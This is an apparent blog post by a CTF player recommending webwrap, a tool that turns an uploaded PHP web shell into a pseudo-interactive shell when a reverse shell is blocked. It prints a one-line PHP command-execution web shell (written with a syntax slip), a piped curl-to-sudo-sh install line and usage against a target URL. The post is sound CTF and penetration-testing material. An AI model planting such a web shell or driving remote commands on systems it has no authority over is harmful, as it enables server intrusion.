webwrap - An amazing pseudo web shell tool


A few days ago, while doing a CTF I’ve encountered a problem. I was able to upload a PHP file to the target server, but I couldn’t spawn a web shell due to firewall restrictions. The only way I could interact with the server was by executing commands using the uploaded PHP files and printing output on the page.

The simplified PHP file (the original one utilized a disabled_functions bypass, because exec() was disabled in the config):

echo exec($_GET(['cmd']));

Until that CTF I was using a python script to automate it. In a while loop: get user input, create a request and print the response to the terminal. It works, but it’s very inefficient mainly because it doesn’t keep the current path. Fortunately, I found a tool that does exactly what I need!


webwrap is a tool that automates the process described above and creates a pseudo shell that simulates a real one. Github: https://github.com/mxrch/webwrap


Linux (Quick)

curl -s https://raw.githubusercontent.com/mxrch/webwrap/master/install.sh | sudo sh

Linux (normal)

sudo apt install rlwrap
git clone https://github.com/mxrch/webwrap;
cd webwrap;
sudo python3 -m pip install -r requirements.txt


git clone https://github.com/mxrch/webwrap;
cd webwrap;
python -m pip install -r requirements.txt


webwrap http://<LINK>/my_verycool_webshell.php?cmd=WRAP


  • my_verycool_webshell.php is your shell file
  • cmd is the argument that shell uses $_GET(['<here>'])


While using this tool you need to remember that it is not a real shell. Commands such as su or shh will not work as they require a full interactive terminal, but some of them can be bypassed with e.g. python’s pty. Additionally, commands that take more than ~2 seconds to execute will time out the request and break the script.


webwrap is an amazing tool to use when you cannot have a regular reverse shell. It automates a process of requesting command executions and makes you gain speed. Although it has its limitations I’ll definitely use it in future CTFs.


webwrap’s author: mxrch
webwrap’s github: Github